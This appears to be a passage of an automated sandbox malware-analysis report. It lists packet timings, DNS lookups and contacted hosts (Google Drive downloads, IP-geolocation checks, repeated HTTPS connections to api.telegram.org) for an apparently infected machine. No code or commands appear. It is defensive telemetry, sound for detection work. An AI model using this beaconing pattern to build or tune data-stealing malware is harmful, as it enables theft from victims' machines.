                                                                                                                              Dec 3, 2024 15:23:23.412373066 CET49894443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:23.412394047 CET44349894149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:23.463773012 CET4988880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:24.894797087 CET44349894149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:24.896927118 CET49894443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:24.896940947 CET44349894149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:24.896995068 CET49894443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:24.897002935 CET44349894149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:25.604897022 CET44349894149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:25.604993105 CET44349894149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:25.605061054 CET49894443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:25.605722904 CET49894443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:25.609353065 CET4988880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:25.610675097 CET4990080192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:25.730094910 CET8049888132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:25.730154991 CET4988880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:25.730593920 CET8049900132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:25.730664968 CET4990080192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:25.730920076 CET4990080192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:25.851079941 CET8049900132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:27.034535885 CET8049900132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:27.036371946 CET49903443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:27.036416054 CET44349903149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:27.036487103 CET49903443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:27.036803007 CET49903443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:27.036815882 CET44349903149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:27.088763952 CET4990080192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:28.566736937 CET44349903149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:28.582169056 CET49903443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:28.582190990 CET44349903149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:28.582252026 CET49903443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:28.582262039 CET44349903149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:29.303159952 CET44349903149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:29.303237915 CET44349903149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:29.303324938 CET49903443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:29.316051960 CET49903443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:29.354928017 CET4990080192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:29.359453917 CET4990880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:29.475199938 CET8049900132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:29.475337982 CET4990080192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:29.479443073 CET8049908132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:29.479530096 CET4990880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:29.479759932 CET4990880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:29.599695921 CET8049908132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:30.923572063 CET8049908132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:30.924959898 CET49913443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:30.925005913 CET44349913149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:30.925067902 CET49913443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:30.925365925 CET49913443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:30.925379992 CET44349913149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:30.963809013 CET4990880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:32.334507942 CET44349913149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:32.346354961 CET49913443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:32.346384048 CET44349913149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:32.346436977 CET49913443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:32.346445084 CET44349913149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:32.999257088 CET44349913149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:32.999425888 CET44349913149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:32.999509096 CET49913443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:33.005228996 CET49913443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:33.009569883 CET4990880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:33.011101007 CET4991980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:33.131138086 CET8049919132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:33.131279945 CET4991980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:33.133579016 CET8049908132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:33.133644104 CET4990880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:34.010796070 CET4991980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:34.131445885 CET8049919132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:34.131675959 CET4991980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:34.131933928 CET4991980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:34.251898050 CET8049919132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:35.436189890 CET8049919132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:35.451158047 CET49925443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:35.451210976 CET44349925149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:35.451293945 CET49925443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:35.451741934 CET49925443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:35.451752901 CET44349925149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:35.479427099 CET4991980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:36.859810114 CET44349925149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:36.861763000 CET49925443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:36.861777067 CET44349925149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:36.861833096 CET49925443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:36.861836910 CET44349925149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:37.577528954 CET44349925149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:37.577692032 CET44349925149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:37.577750921 CET49925443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:37.578233004 CET49925443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:37.581573963 CET4991980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:37.583679914 CET4993180192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:37.702444077 CET8049919132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:37.702605963 CET4991980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:37.704066992 CET8049931132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:37.704164982 CET4993180192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:37.704580069 CET4993180192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:37.824500084 CET8049931132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:39.064112902 CET8049931132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:39.065753937 CET49935443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:39.065798044 CET44349935149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:39.065866947 CET49935443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:39.066184044 CET49935443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:39.066201925 CET44349935149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:39.104516983 CET4993180192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:40.489152908 CET44349935149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:40.541989088 CET49935443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:40.601248980 CET49935443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:40.601274014 CET44349935149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:40.635381937 CET49935443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:40.635411978 CET44349935149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:41.186564922 CET44349935149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:41.186785936 CET44349935149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:41.186840057 CET49935443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:41.187458992 CET49935443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:41.199634075 CET4993180192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:41.201176882 CET4993980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:41.320470095 CET8049931132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:41.320523024 CET4993180192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:41.321182966 CET8049939132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:41.321254969 CET4993980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:41.321688890 CET4993980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:41.441559076 CET8049939132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:42.626117945 CET8049939132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:42.627862930 CET49943443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:42.627899885 CET44349943149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:42.627979040 CET49943443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:42.628282070 CET49943443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:42.628298044 CET44349943149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:42.667047024 CET4993980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:44.088567972 CET44349943149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:44.135726929 CET49943443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:44.244146109 CET49943443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:44.244169950 CET44349943149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:44.244242907 CET49943443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:44.244259119 CET44349943149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:44.858158112 CET44349943149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:44.858254910 CET44349943149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:44.858345032 CET49943443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:44.858938932 CET49943443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:44.862606049 CET4993980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:44.864384890 CET4994880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:44.983459949 CET8049939132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:44.983772993 CET4993980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:44.984407902 CET8049948132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:44.984545946 CET4994880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:44.984883070 CET4994880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:45.104984999 CET8049948132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:46.335513115 CET8049948132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:46.336869001 CET49951443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:46.336927891 CET44349951149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:46.336983919 CET49951443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:46.337333918 CET49951443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:46.337361097 CET44349951149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:46.378781080 CET4994880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:47.705626011 CET44349951149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:47.709760904 CET49951443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:47.709794044 CET44349951149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:47.709881067 CET49951443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:47.709891081 CET44349951149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:48.483834982 CET44349951149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:48.484046936 CET44349951149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:48.484093904 CET49951443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:48.484513998 CET49951443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:48.487934113 CET4994880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:48.489293098 CET4995680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:48.608664989 CET8049948132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:48.609155893 CET4994880192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:48.609340906 CET8049956132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:48.609437943 CET4995680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:48.609688997 CET4995680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:48.729612112 CET8049956132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:50.005939960 CET8049956132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:50.007353067 CET49962443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:50.007392883 CET44349962149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:50.007469893 CET49962443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:50.007735014 CET49962443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:50.007749081 CET44349962149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:50.057595015 CET4995680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:51.373985052 CET44349962149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:51.375797033 CET49962443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:51.375819921 CET44349962149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:51.375890970 CET49962443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:51.375900984 CET44349962149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:52.010777950 CET44349962149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:52.010894060 CET44349962149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:52.010962963 CET49962443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:52.011574030 CET49962443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:52.039417028 CET4995680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:52.040663004 CET4996680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:52.160046101 CET8049956132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:52.160144091 CET4995680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:52.160557985 CET8049966132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:52.160644054 CET4996680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:52.160885096 CET4996680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:52.280826092 CET8049966132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:53.559438944 CET8049966132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:53.562375069 CET49968443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:53.562423944 CET44349968149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:53.562603951 CET49968443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:53.563122988 CET49968443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:53.563136101 CET44349968149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:53.604574919 CET4996680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:54.976423979 CET44349968149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:54.978204012 CET49968443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:54.978221893 CET44349968149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:54.978281975 CET49968443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:54.978292942 CET44349968149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:55.703536987 CET44349968149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:55.703721046 CET44349968149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:55.703779936 CET49968443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:55.704108953 CET49968443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:55.708126068 CET4996680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:55.709693909 CET4997380192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:55.829436064 CET8049966132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:55.829504967 CET4996680192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:55.829602003 CET8049973132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:55.829669952 CET4997380192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:55.829879045 CET4997380192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:55.950133085 CET8049973132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:57.136209011 CET8049973132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:57.137563944 CET49978443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:57.137628078 CET44349978149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:57.137701035 CET49978443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:57.138012886 CET49978443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:57.138026953 CET44349978149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:57.182645082 CET4997380192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:58.590523005 CET44349978149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:58.593733072 CET49978443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:58.593750954 CET44349978149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:58.593794107 CET49978443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:58.593800068 CET44349978149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:59.435950041 CET44349978149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:59.436079025 CET44349978149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:59.436139107 CET49978443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:59.436557055 CET49978443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:23:59.440505981 CET4997380192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:59.441287994 CET4997980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:59.560894966 CET8049973132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:59.560957909 CET4997380192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:59.561254025 CET8049979132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:23:59.561331987 CET4997980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:59.561739922 CET4997980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:23:59.681790113 CET8049979132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:00.913367987 CET8049979132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:00.919672966 CET49980443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:24:00.919739008 CET44349980149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:00.919821024 CET49980443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:24:00.920192957 CET49980443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:24:00.920218945 CET44349980149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:00.963943005 CET4997980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:24:02.287229061 CET44349980149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:02.338901043 CET49980443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:24:04.712009907 CET49980443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:24:04.712044954 CET44349980149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:04.712114096 CET49980443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:24:04.712121010 CET44349980149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:05.296610117 CET44349980149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:05.296691895 CET44349980149.154.167.220192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:05.296972990 CET49980443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:24:05.297314882 CET49980443192.168.2.7149.154.167.220
                                                                                                                              Dec 3, 2024 15:24:05.300239086 CET4997980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:24:05.301417112 CET4998180192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:24:05.421333075 CET8049979132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:05.421427965 CET8049981132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:05.423446894 CET4997980192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:24:05.423635960 CET4998180192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:24:05.423635960 CET4998180192.168.2.7132.226.247.73
                                                                                                                              Dec 3, 2024 15:24:05.543690920 CET8049981132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:06.803620100 CET8049981132.226.247.73192.168.2.7
                                                                                                                              Dec 3, 2024 15:24:06.854551077 CET4998180192.168.2.7132.226.247.73
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 3, 2024 15:22:39.869385004 CET5924953192.168.2.71.1.1.1
                                                                                                                              Dec 3, 2024 15:22:40.007324934 CET53592491.1.1.1192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:42.750113964 CET5258053192.168.2.71.1.1.1
                                                                                                                              Dec 3, 2024 15:22:42.887569904 CET53525801.1.1.1192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:48.890260935 CET4963553192.168.2.71.1.1.1
                                                                                                                              Dec 3, 2024 15:22:49.027896881 CET53496351.1.1.1192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:51.267581940 CET5978053192.168.2.71.1.1.1
                                                                                                                              Dec 3, 2024 15:22:51.406538963 CET53597801.1.1.1192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:59.551228046 CET5902353192.168.2.71.1.1.1
                                                                                                                              Dec 3, 2024 15:22:59.690095901 CET53590231.1.1.1192.168.2.7
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Dec 3, 2024 15:22:39.869385004 CET192.168.2.71.1.1.10x9d4cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:42.750113964 CET192.168.2.71.1.1.10x8159Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:48.890260935 CET192.168.2.71.1.1.10x640eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:51.267581940 CET192.168.2.71.1.1.10xba39Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:59.551228046 CET192.168.2.71.1.1.10x9befStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Dec 3, 2024 15:22:40.007324934 CET1.1.1.1192.168.2.70x9d4cNo error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:42.887569904 CET1.1.1.1192.168.2.70x8159No error (0)drive.usercontent.google.com142.250.181.97A (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:49.027896881 CET1.1.1.1192.168.2.70x640eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:49.027896881 CET1.1.1.1192.168.2.70x640eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:49.027896881 CET1.1.1.1192.168.2.70x640eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:49.027896881 CET1.1.1.1192.168.2.70x640eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:49.027896881 CET1.1.1.1192.168.2.70x640eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:49.027896881 CET1.1.1.1192.168.2.70x640eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:51.406538963 CET1.1.1.1192.168.2.70xba39No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:51.406538963 CET1.1.1.1192.168.2.70xba39No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                              Dec 3, 2024 15:22:59.690095901 CET1.1.1.1192.168.2.70x9befNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                              • drive.google.com
                                                                                                                              • drive.usercontent.google.com
                                                                                                                              • reallyfreegeoip.org
                                                                                                                              • api.telegram.org
                                                                                                                              • checkip.dyndns.org
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
